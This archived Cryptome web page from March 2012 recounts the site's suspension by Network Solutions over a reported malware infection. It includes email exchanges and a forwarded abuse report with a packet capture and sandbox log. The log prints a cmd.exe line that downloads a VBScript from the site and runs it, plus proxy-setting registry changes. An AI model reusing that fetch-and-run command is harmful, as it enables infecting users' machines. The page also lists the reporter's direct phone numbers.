14 March 2012.
A reader writes
cryptome-shut.htm is
reported to be malware due to the contents of the Steve Wiley's email reporting
infection of Cryptome files.
In the past Cryptome has received claims that it is hosting malware because
files contain the names of malware but not the malware (an email in the
cyperpunks archive).
In a few other cases Cryptome has hosted malware needed for research and
defense against malware -- such as the DIRT trojan -- those files are also
reported as malware.
Recently the HBGary cache of malware research contained large numbers of
actual malware; when selections were hosted on Cryptome those files also
produced malware reports.
There are also instances of infected files cached by Google's and other
aggregator's siphon of Cryptome setting off malware alarms due to the cached
and purloined files being delivered to users rather than subsequently-cleaned
files on Cryptome.
Take it or leave it, both Google and Norton report Cryptome is safe and free
of infection even while malware sleuths claim it is infected. Malware claims
are growing as publicity about them increases, similar to cybersecurity panic
in general.
Our latest Norton protection program is obnoxiously abusive: hogs CPU, delays
email unnecessarily, blares warnings, pop-ups in the middle of work demanding
attention, behaving like an authoritarian spy and police officer claiming
to protect when it is merely hawking its blind faith religion.
Zealots of cleanliness all too often turn out to be Typhoid Marys due to
ignorance about how infection is spread and promulgation of half-baked hygienic
methods more dangerous than vermin.
Cryptome advises avoidance of Cryptome as insecure and infected and to protect
yourself against those pushing security and purity.
13 March 2012.
Cryptome.org has moved to a new ISP. For now February-March 2012 files are
available. All the files will be gradually added.
The IT person and Network Solutions have apologized for the shutdown. By
then all files had been deleted from the NetSol site and the domain transferred
to a new ISP.
From: "Wiley, Steve" <swiley[at}DowneyBrand.com>
To: "'Lee [at} Royal Gardens'" <lee[at}royalgardens.us>,
"jya[at}pipeline.com"<jya[at}pipeline.com>
Date: Mon, 12 Mar 2012 18:50:56 -0700
Subject: RE: Cryptome Downed
Please accept my apologies. I am sorry if I have alarmed you or caused
any trouble. I am on your side. I am not blaming you for anything.
I merely alerted you directly and timely to what I believed was a
substantial problem with your website, with an eye solely towards helping
you preserve your visitors security and by extension, your reputation.
I alerted your ISP in the same email I alerted you, for the same reason -
to help you preserve your site reputation. If you are on vacation, if your
registrar has outdated contact info for you etc, your ISP may be the
only one who I am able to contact quickly. I contact all manner of site operators
daily, and most are in no position to help themselves, so I always include
their ISP. Most of the time the ISP is the only person who gets my email,
I usually get bounces from the other email addresses I try. Most sites
are on hosted servers so alerting the ISP to fix one server, may preserve
the integrity of many hundreds of domains as well as their
visitors/clients/employees computers from infection.
I see you have had some disagreements with ISPs in the past, and I want to
assure you that I did not know that before I communicated with you or your
ISP. I do not want to cause any trouble for you, I only want to help
you. I do not have any agenda other than helping people whose sites
have been hacked. Sometimes I have little time to compose the emails,
and in my haste to alarm people to trouble my communications come off somewhat
terse. Sometimes my attempts at helping blows up in my face, and I am
constantly reminded of the ancient phrase which surely has resulted in much
hilarity over the eons: don't shoot the messenger (please). Again please
accept my apologies.
_____
Subject: Network Solutions - Service Request 1-583317019
Date: Tue, 13 Mar 2012 00:11:29 -0400
From: "Network Solutions Support"
<siebelcustserv[at}networksolutions.com>
To: "John Young" <jya[at}pipeline.com>,
<cryptome[at}earthlink.net>
Dear John,
I am sorry to hear that your site was suspended. We have removed the
suspension and we have technicians available that can restore the content
which you removed from the server. If you would like us to restore
this content for you, please email listen[at}networksolutions.com.
This email is monitored by my team, as well as others, 24/7 and we can get
the content restored fairly quickly.
If you have any questions regarding this specific Service Request, you can
chat directly with our Technical Support team by clicking on the following
link:
http://www.networksolutions.com/dms/support.jsp
If you have any other questions please visit our comprehensive support section
at
http://www.networksolutions.com/support/
or contact our Support Center and refer to Service Request 1-583317019 and
a specialist will be happy to further assist you and ensure that we completely
resolve your issue as quickly as possible.
Special Offer - 11% off on a new purchase. Valid on new purchases only. Does
not include Web Design, Pay-Per-Click, or SEO offerings. See below for details.
We understand that waiting on resolution for an issue is sometimes
frustrating. We appreciate all of our customers, and our commitment
to you is to provide the fastest service possible without sacrificing
quality. For any inconveniences that you may have endured, please feel
free to take advantage of the following offer:
http://ads.networksolutions.com/landing?code=P99C383S603N0B11A1D38E0000V100&promo=GCMKT00043
Thank You,
Daniel
Technical Services
Network Solutions
http://www.networksolutions.com/support/
US/Can: 1.866.391.4357
International: 1.570.708.8788
12 March 2012
Cryptome Shut by Network Solutions
Cryptome was shutdown by its ISP, Network Solutions, at 12/Mar/2012:14:30:37
-0400 in
response to an IT person reporting an infection. Messages: |
|
Subject: Network Solutions Policy Violation - Reference number 1-583317019
Date: Mon, 12 Mar 2012 15:24:09 -0400
From: "Network Solutions Support" <siebelcustserv[at}networksolutions.com>
To: "John Young" <jya[at}pipeline.com>
Dear John,
Your hosting package 01938F7.NETSOLHOST.COM was suspended because it is
compromised due to vulnerabilities in your website code. I apologize for
any inconvenience this may have caused. You will need to remove any and
all malicious code, as well as secure the code itself which is allowing
these vulnerabilities to occur. Below is an example of one of the malicious
URL s which are being used. I would also recommend changing any ftp passwords
which you have configured.
One of many malicous URLs: hxxp://cryptome.org//Index/content/hcp_vbs.php?f=16&d=0
There may be other compromised content which was not discovered which should be
removed as well.
If you have any other questions please visit our comprehensive support section at
http://www.networksolutions.com/support/ or contact our Support Center and refer
to Service Request 1-583317019 and a specialist will be happy to further assist
you and ensure that we completely resolve your issue as quickly as possible.
Thank You,
Daniel
Technical Services
Network Solutions
http://www.networksolutions.com/support/
US/Can: 1.866.391.4357
International: 1.570.708.8788
Message No. 1 from IT person:
From: "Wiley, Steve" <swiley[at}DowneyBrand.com>
To: "'noc[at}networksolutions.com'" <noc[at}networksolutions.com>,
"'abuse[at}networksolutions.com'" <abuse[at}networksolutions.com>
CC: "'cryptome[at}earthlink.net'" <cryptome[at}earthlink.net>,
"'jya[at}pipeline.com'"<jya[at}pipeline.com>
Date: Mon, 12 Mar 2012 11:25:44 -0700
Subject: Infected host at IP 205.178.145.72 cryptome.org
The site cryptome.org at IP 205.178.145.72 is hosting malicious binaries.
Analysis and original PCAP is below.
One of many malicous URLs: hxxp://cryptome.org//Index/content/hcp_vbs.php?f=16&d=0
PCAP:
IP 10.1.1.86.1867 > 205.178.145.72.80: tcp 171
E... .[at}...p<
..V...H.K.PP..p...*P....\..GET /Index/w.php?f=16&e=0 HTTP/1.1
User-Agent: Java/1.6.0_21
Host: cryptome.org
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 0
E..(6.[at}....y...H
..V.P.K...*P...P.............
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 1448
E...J.[at}........H
..V.P.K...*P...P..._...HTTP/1.1 200 OK
Date: Mon, 12 Mar 2012 16:33:50 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8e DAV/2 PHP/5.3.2 with Suhosin-Patch
X-Powered-By: PHP/5.3.2
Pragma: public
Expires: Mon, 12 Mar 2012 16:34:45 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info.exe"
Content-Transfer-Encoding: binary
Content-Length: 360960
Content-Type: application/x-msdownload
Set-Cookie: client=done; expires=Tue, 13-Mar-2012 16:33:51 GMT; path=/
Keep-Alive: timeout=5, max=400
Connection: Keep-Alive
MZ......................[at}............................................. .!..L.!
This program cannot be run in DOS mode.
$............}...}...}...,...}.......}.......}...//..}.../...}.../...}.......}
...}...}...,+..}...,/..}...,...}...,...}...,...}..Rich.}......................
....PE..L...[at}..N..............
......H....................[at}..........................0.......................
...........................d.......B7.........................................
..................................................................text...|....
....................... ..`.rdata..8...........................[at}....data...
...........................[at}....rsrc...B7.......8..................[at}..[at}.......
..............................................................................
............................................................................
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 1460
E...`1[at}........H
..V.P.K....P...P....c.........................................................
..............................................................................
...........................................>...
.'..3......K..$..>...
....3......K..$..>.....]..3......K..$...U....8....K...<....N..R.....ZRQ......P
.%......Z...K..?W..X...Y....8]...>...
.h..3....<.K..$..>.....^..3....`.K..$..>...
$...3......K..$...U....P1.\.........RT..Sj[at}..
..Rh..K......R..<(.....#z.,$..,.K........YZh..K...x.....x.....+.K..8.K..9.g.3.
........3..4.Y.8.....;...........u.R.....Z..P]...>........3....t.K..$..>....7[
..3......K..$...U....(...K..}.S..<..........~......[j......j........(].....>..
.....3....|.K..$...U....4...K.......R......SP........ZR.
...ZR.....Z..4]..>.....T..3......K..$...U....0...K.......Pj......XP.p.WV..8...
........XP.....W.E...X..0]....U....$...K..YdQ.....V."...YQVSP........YQ.v...Y.
.$]....>........3....L.K..$..>...
.}..3......K..$..>...
:{..3....$.K..$...U....T.p.K..E.j......V.v.WP.......^......^j........T]..>....
.r..3....\.K..$..>.....z..3......K..$..>....=u..3....x.K..$..>....p...3....P.K
..$..>.....3..3.... .K..$..>.....8..3....H.K..$..>....G...3......K..$..>....|m
..3......K..$..>........3....[at}.K..$..>....,:..3....8.K..$...j.j.j..........g..
.j.j.j0..$..K.......P;.....(..`..*.......a...>...
.q..3....X.K..$...U....[at}...K....3..v.W.wxP.wP.......
......_j......j..2.....[at}]...>...
....3......K..$..>...
....3....,.K..$..>........3....D.K..$..>...
8;..3....T.K..$..>....."..3....p.
IP 10.1.1.86.1867 > 205.178.145.72.80: tcp 0
E..(nT[at}...#*
..V...H.K.PP.......P.............
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 1436
E...v.[at}....=...H
..V.P.K....P...P...V...K..$..>...
.+..3....h.K..$..>........3....0.K..$..>...
K~..3....l.K..$..>.....M..3....d.K..$..>.....M..3......K..$..>.....5..3......K.
.$...U....`.5..K. vTV......Q.......4......^j......j........`]...>.......
.3......K..$..>....q ..3......K..$..>...
2r..3......K..$..>...
.-..3....(.K..$..>...
.k..3......K..$...U....H. .K...,...j..&...S.s`..|...R..4....d......[.....V.....
..H]...........................................................................
...............................................................................
...............................................................................
...............................................................................
.............................................................................I.
..N.a./.k......&....gc!..}..p....O.>../..E.~.2.a5...f.em.Ki.I.gF.#PT.#Q.H4;:.gn
h...hq$]i<O..;&K.?i.H............. ..^...^.|.a.}d..`Z.'....9....t.L..$..4%=
....R....CC..L.I...b...b....?...... ...&[..&./.../..K6..?.i...i.'?..L...Q......
...D.~.C%..B{.v..wv.;w.....`.........H......X..rO..ro.....t.R..'W..WW........h%
....._...kf....Os.FKg7.J.C...GH...a.p.qT..uL...R"8.g..|.2[at}.-..........M]2j._2j.
.Fi>...K..D.u......[at}1.9.0SF.c....s)...)..p....l>..m?...[at}..F...F..A..J=;.2F?.2.>
)c.>*.5.7Fv.q...v)..n...r....&..n.....Y.!.Y1........<..[.'....b....}U..........
0>M$1AM$.Q.(...L...L...Q....zO....[at}.p.[at}....B.xA...[at}6p.<.oX[at}.0.Dj/$E.......G.6*.
?2V....P.U Ul. .x.....=B. N....|C.......lC!
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 1460
E...v.[at}........H
..V.P.K..."P...P.......%.F$J.F$..F...E...0.V..*.n......-......(I.J.M6.G.j......
..,.W.,.......R..)...)........[a.W..V\..f\...D.\TI.]dI...M...M..KZ..X....|PFLN:
.5Sm....5.0H>./X?.0lG.....C.';..X...Y..\B.;\s.<lt...y4..z4.S.3._..[at}.hV.9...%...
"`.............t...............6........D.!Shm+Shn..hn..f...%...Y..Q"..UF..Yj~u
..p..........f,-.q--.Y.,.Y....25w.35w..4w.........89......D...Ec?&.e?&...N...N.
.(ou.(ovc..0...1........8...y......3.Sd......;.\y......C]..G^:].......k.T.&.T.&
...&.S...K3.
..S.....A].j.........:,......}.l.}..........k...........w.V....TOd'............
T...H...I..I...i_.<v..<v.:...:...f/..f;..e..srIRu..!....f\..g\p...3i..Tk.......
....,...I..g..B.'.f.*,.C...C.sd.........l...k..e0..e0.e.L.(..Z.....`.(p.V..!V..
..k.......6.....XK....wr..w...<....)...0g.N=....)..uP..u.Z ..m!...)P.|q.\(.YV.h
.....Y.o...4...... v.. w.qf.a2kr.V{..V{..V{:.V{;j..2.w..7%c...kC..{D..i.T....wz
I..4.Jki...........y.....q....F...C;w.....)...).^.(Qo...\...]4.<b5.<........\..
.....2...3.gR3N...R.....d.n.5.C......_8t.=t
7^.V.[at}s/.!0."....~...Wp..V:L0...Y.)..`. ..,
.]u.T.4I{...2...2...2...2...2...2...2...2...2...2...2.0.${}K..L.R
...................\...*.......z...............j...................:...J.......
....&...r...8...........J...........d.......V..................................
.....................................L...............8...................p.....
..........,...........................
...................\...*.......z...............j...................:...J.......
....&...r...8
IP 10.1.1.86.1867 > 205.178.145.72.80: tcp 0
E..(n\[at}...#"
..V...H.K.PP.......P....9........
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 1460
E...v.[at}........H
..V.P.K....P...P..................J...........d.......V........................
...........................b.FreeEnvironmentStringsA.w.GetModuleHandleA..u.Open
EventA....GlobalLock..j.GetACP....FreeConsole...CreateEventA....IsBadReadPtr...
.GlobalUnlock..f.GetStdHandle..>.LoadLibraryExW..2.CloseHandle...ResumeThread..
0.FindClose.}.OpenMutexA..y.GetSystemTime...VirtualProtectEx..I.LocalFree.N.lst
rlenA..i.GetLastError..KERNEL32.dll....IsMenu..>.GetMessageA.>.GetMessageA...Ge
tDlgItemTextA...DialogBoxParamA...GetComboBoxInfo.{.SetFocus....LoadCursorA._.G
etSubMenu..-.ClipCursor..R.CreateWindowExA...EndDialog...IsIconic..USER32.dll..
..ASN1BERDecBool..7.ASN1BEREncNull....ASN1BERDecCheck.b.ASN1DecAlloc..;.ASN1BER
EncOpenType..MSASN1.dll....MessageBoxA.USER32.dll..............................
...............................................................................
...............................................................................
..............................j.h.e.r.t.a.u.i.k.l.s.e.r.v.n.m.c.o.m.u.i.d...d.l
.l...l.x.n.d.e.r.t.l.o.p.u.y.t.x.c.a...........................................
...............................................................................
...............................................................................
...............................................................................
...............................................................................
.............................................................
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 1460
E...v.[at}........H
..V.P.K....P...P....U..........................................................
...............................................................................
...............................................................................
...............................................................................
...............................................................................
...............................................................................
........................................................................ ......
.[at}.......................X.......p...........................................
....................... ....................... ............%..........x.......
........ '.."...........(...0...`..... ......%.................................
............................................................................$..
.'...'...#.....................................................................
.................................................................. ...........
....$...1...C...U...f...y...........................r...a...M...=...-..........
...............................................................................
.......... ...............&...4...B...W...l............'''.utu.............
....]]\................|...e...O...=.......#...........
...............................................................................
....&...3...C...U...h...}....<==...............................................
.....u...`.
BINARY ANALYSIS:
Orig. Traffic Capture J-10.1.1.86-322348.pcappcap 436027 bytes (text)
VM Capture W9223397244018158380-79636-201-2012-03-12-173747.pvna.pcappcap 220175
bytes (text)
Source Host: xxxxVM.downeybrand.com
Src IP: 10.x.x.86
Src MAC Address: 00:22:0d:4e:89:c2
Malware: Exploit.Browser
Analysis OS: Microsoft WindowsXP Professional 5.1 sp3
Bot Communication Details:
Server DNS Name: cryptome.org
Infection URLs:
DL URL Occurred Content Type DL URL Occurred Content Type
[] cryptome.org/blm042408.htm 03/12/12 17:37:32 text/html [] cryptome.org/Index/
edu.class 03/12/12 17:37:48 text/html
[] cryptome.org/Index/index.php 03/12/12 17:37:39 text/html [] cryptome.org/Index/
net.class 03/12/12 17:37:49 text/html
[] cryptome.org/Index/content/Jas.jar 03/12/12 17:37:47 [] cryptome.org/Index/
org.class 03/12/12 17:37:49 text/html
[] cryptome.org/Index/com.class 03/12/12 17:37:48 text/html [] cryptome.org/Index/
w.php?f=16&e=0 03/12/12 17:38:45
OS Change Detail | Items: 55 | OS Info: Microsoft WindowsXP Professional 5.1
sp3 Top
Type Mode/Class Details (Path/Message/Protocol/Hostname/Qtype/ListenPort etc.)
Process ID Parent ID File Size
Process Started C:\WINDOWS\system32\cmd.exe
Packed: no GUI: no
Parentname: C:\WINDOWS\pchealth\helpctr\binaries\helpctr.exe
Command Line: "C:\WINDOWS\system32\cmd.exe" /c echo B="l.vbs":With CreateObject
("MSXML2.XMLHTTP"):.open "GET","http://cryptome.org//Index/content/hcp_vbs.php?f=
16&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.
CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End
With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B >
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\l.vbs && C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
\\l.vbs && taskkill /F /IM helpctr.exe 2464 444
Malicious Alert Anomaly Tag Message: Startup behavior anomalies observed
Detail: A new process has been launched
Mutex \BaseNamedObjects\SHIMLIB_LOG_MUTEX 2464
Mutex Imagepath: C:\WINDOWS\system32\cmd.exe 2464
File Created C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\l.vbs 2464
File Close C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\l.vbs
MD5: df2ce7c80bd3f1170b46c3adb4d6c6eb
SHA1: 4389878cb1c3e83abac7817336a55834b9d845b1 2464 349
Mutex Imagepath: C:\WINDOWS\system32\cmd.exe 2464
File Open C:\Documents and Settings\Administrator\My Documents\desktop.ini 2464
84
Mutex \BaseNamedObjects\ZoneAttributeCacheCounterMutex 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"IntranetName" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001 2464
Mutex \BaseNamedObjects\ZoneAttributeCacheCounterMutex 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"IntranetName" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001 2464
Process Started C:\WINDOWS\system32\cscript.exe
Packed: no GUI: no
Parentname: C:\WINDOWS\system32\cmd.exe
Command Line: "C:\WINDOWS\System32\CScript.exe" //nologo "C:\DOCUME~1\ADMINI~1\
LOCALS~1\Temp\l.vbs" 2492 2464
Network Connected Protocol Type: udp Destination Port: 1057 IP Address:
127.0.0.1
Imagepath: C:\WINDOWS\system32\cscript.exe 2492
Network Connect Protocol Type: tcp Destination Port: 8080 IP Address:
10.0.0.2
Imagepath: C:\WINDOWS\system32\cscript.exe 2492
Mutex \BaseNamedObjects\SHIMLIB_LOG_MUTEX 2492
Mutex Imagepath: C:\WINDOWS\system32\cscript.exe 2492
File Open C:\Documents and Settings\Administrator\Local Settings\Temporary Internet
Files\Content.IE5\index.da
t 2492 458752
Folder Open C:\Documents and Settings\Administrator\Cookies 2492
File Open C:\Documents and Settings\Administrator\Cookies\index.dat 2492 32768
File Open C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\
index.dat 2492 81920
Mutex Imagepath: C:\WINDOWS\system32\cscript.exe 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\"ProxyEnable" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software
Microsoft\Windows\CurrentVersion
\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 08 04 00 00
03 00 00 00 0d 00
00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 0
0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2492
Mutex \BaseNamedObjects\ZoneAttributeCacheCounterMutex 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"IntranetName" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001 2492
Mutex \BaseNamedObjects\ZoneAttributeCacheCounterMutex 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"IntranetName" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\"ProxyEnable" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 09 04 00 00
03 00 00 00 0d 00
00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 0
0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2492
File Open C:\Documents and Settings\Administrator\Cookies\administrator[at}cryptome
[1].txt
MD5: ed4a45a7588fad273b23c6e409593c56
SHA1: 6bfdb93fffa62e01d97a724e6a56c15242b54d6b 2492 72
File Created C:\Documents and Settings\Administrator\Local Settings\Temporary
Internet Files\Content.IE5\OXYNKLQB
\hcp_vbs[1].jpg 2492
File Close C:\Documents and Settings\Administrator\Local Settings\Temporary
Internet Files\Content.IE5\OXYNKLQB
\hcp_vbs[1].jpg
MD5: 3ac9a0c8a8a5ec6d3aba629bf66f9fb1
SHA1: 5b8d4280ff6fc9c8e1b9593cbaeb04a29e64a81e 2492 28672
File Overwritten C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\l.vbs
MD5: df2ce7c80bd3f1170b46c3adb4d6c6eb
SHA1: 4389878cb1c3e83abac7817336a55834b9d845b1 2492 349
File Close C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\l.vbs
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 2492 349
Process Terminated C:\WINDOWS\system32\cscript.exe
Parentname: C:\WINDOWS\system32\cmd.exe 2492 2464
Process Started C:\WINDOWS\system32\taskkill.exe
Packed: no GUI: no
Parentname: C:\WINDOWS\system32\cmd.exe 2628 2464
Malicious Alert Misc Anomaly Message: External process termination
Detail: Malware trying to terminate an external process
Mutex \BaseNamedObjects\SHIMLIB_LOG_MUTEX 2628
Mutex Imagepath: C:\WINDOWS\system32\taskkill.exe 2628
Mutex Imagepath: C:\WINDOWS\system32\taskkill.exe 2628
Process Terminated C:\WINDOWS\system32\taskkill.exe
Parentname: C:\WINDOWS\system32\cmd.exe 2628 2464
End Of Report
CONFIDENTIALITY NOTICE: This communication and any accompanying
document(s) are confidential and privileged. They are intended for
the sole use of the addressee. If you receive this transmission in
error, you are advised that any disclosure, copying, distribution, or
the taking of any action in reliance upon the communication is
strictly prohibited. Moreover, any such inadvertent disclosure shall
not compromise or waive the attorney-client privilege as to this
communication or otherwise. If you have received this communication
in error, please contact our IS Department at its Internet email address
(is[at}downeybrand.com), or by telephone at (916)444-1000 x5325. Thank
you.
Content-Type: image/jpeg;
name="Picture (Metafile) 1.jpg"
Content-Description: Picture (Metafile) 1.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 1.jpg";
creation-date=Mon, 12 Mar 2012 11:14:22 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <2ad727ec-6788-43a1-8dcc-56c0dd025de6>
[] Picture (Metafile) 1.jpg
Content-Type: image/jpeg;
name="Picture (Metafile) 2.jpg"
Content-Description: Picture (Metafile) 2.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 2.jpg";
creation-date=Mon, 12 Mar 2012 11:14:23 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <8c7bab9f-3f34-4eff-82d5-2e7ea27d451e>
[] Picture (Metafile) 2.jpg
Content-Type: image/jpeg;
name="Picture (Metafile) 3.jpg"
Content-Description: Picture (Metafile) 3.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 3.jpg";
creation-date=Mon, 12 Mar 2012 11:14:23 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <d4415c52-cfa6-4204-90dc-0164435e2d5e>
[] Picture (Metafile) 3.jpg
Content-Type: image/jpeg;
name="Picture (Metafile) 4.jpg"
Content-Description: Picture (Metafile) 4.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 4.jpg";
creation-date=Mon, 12 Mar 2012 11:14:23 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <e3d351f1-7342-4885-9791-22e22d997016>
[] Picture (Metafile) 4.jpg
Content-Type: image/jpeg;
name="Picture (Metafile) 5.jpg"
Content-Description: Picture (Metafile) 5.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 5.jpg";
creation-date=Mon, 12 Mar 2012 11:14:23 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <b33eba00-1ae1-4f4f-934c-67b5e3cb6000>
[] Picture (Metafile) 5.jpg
Content-Type: image/jpeg;
name="Picture (Metafile) 6.jpg"
Content-Description: Picture (Metafile) 6.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 6.jpg";
creation-date=Mon, 12 Mar 2012 11:14:23 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <864e1689-1f94-4b4f-8ff4-aa70b9d95074>
[] Picture (Metafile) 6.jpg
Content-Type: image/jpeg;
name="Picture (Metafile) 7.jpg"
Content-Description: Picture (Metafile) 7.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 7.jpg";
creation-date=Mon, 12 Mar 2012 11:14:23 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <18b3ef02-ec42-4243-9582-dd4713612764>
[] Picture (Metafile) 7.jpg
Content-Type: image/jpeg;
name="Picture (Metafile) 8.jpg"
Content-Description: Picture (Metafile) 8.jpg
Content-Disposition: inline;
filename="Picture (Metafile) 8.jpg";
creation-date=Mon, 12 Mar 2012 11:14:23 GMT;
modification-date=Mon, 12 Mar 2012 11:25:44 GMT
Content-ID: <92f30079-2c46-4e93-a315-cd058d392838>
[] Picture (Metafile) 8.jpg
Message No. 2 from IT person:
From: "Wiley, Steve" <swiley[at}DowneyBrand.com>
To: 'John Young' <jya[at}pipeline.com>
CC: "'noc[at}networksolutions.com'" <noc[at}networksolutions.com>,
"'abuse[at}networksolutions.com'" <abuse[at}networksolutions.com>
Date: Mon, 12 Mar 2012 11:58:32 -0700
Subject: RE: Infected host at IP 205.178.145.72 cryptome.org
Denial is easy, finding this will take a professional. The malicious binary
was transmitted by your server and the activity below was recorded. Websense,
FireEye, and Trend Micro all point to your IP as the infection source -
independent alarms went off simultaneously. That is three large, disparate
security companies pointing at you. The PCAP proves a BINARY was transmitted
FROM YOUR SERVER. What more do you need?
Kind regards,
Steve Wiley
Network Operations Manager
DOWNEY BRAND
621 Capitol Mall, 18th Floor
Sacramento, CA 95814
916/520-5269 Direct
916/520-5669 Fax
swiley[at}downeybrand.com
http://www.downeybrand.com
From: John Young [mailto:jya[at}pipeline.com]
Sent: Monday, March 12, 2012 11:53 AM
To: Wiley, Steve
Cc: 'noc[at}networksolutions.com'; 'abuse[at}networksolutions.com'
Subject: Re: Infected host at IP 205.178.145.72 cryptome.org
There are no malicious binaries nor infection in the files cited.
Only one of the files cited exists, blm042808.htm, and it is has
been checked and found clean.
Most of the files cited do not exist and appear generated by
a rogue attack algorithm. Our access log shows several such
attacks and probes for vulnerabilities.
An attacker may be using your email to spread misinformation
or using your computer system to mount remote attacks.
Much of your message arrived as gibberish which may indicate
it is a forgery.
Nasty stuff on the net and rapidly increasing.
Best regards,
John Young
Administrator
Cryptome.org
Message No. 3 from IT person:
From: "Wiley, Steve" <swiley[at}DowneyBrand.com>
To: 'John Young' <jya[at}pipeline.com>
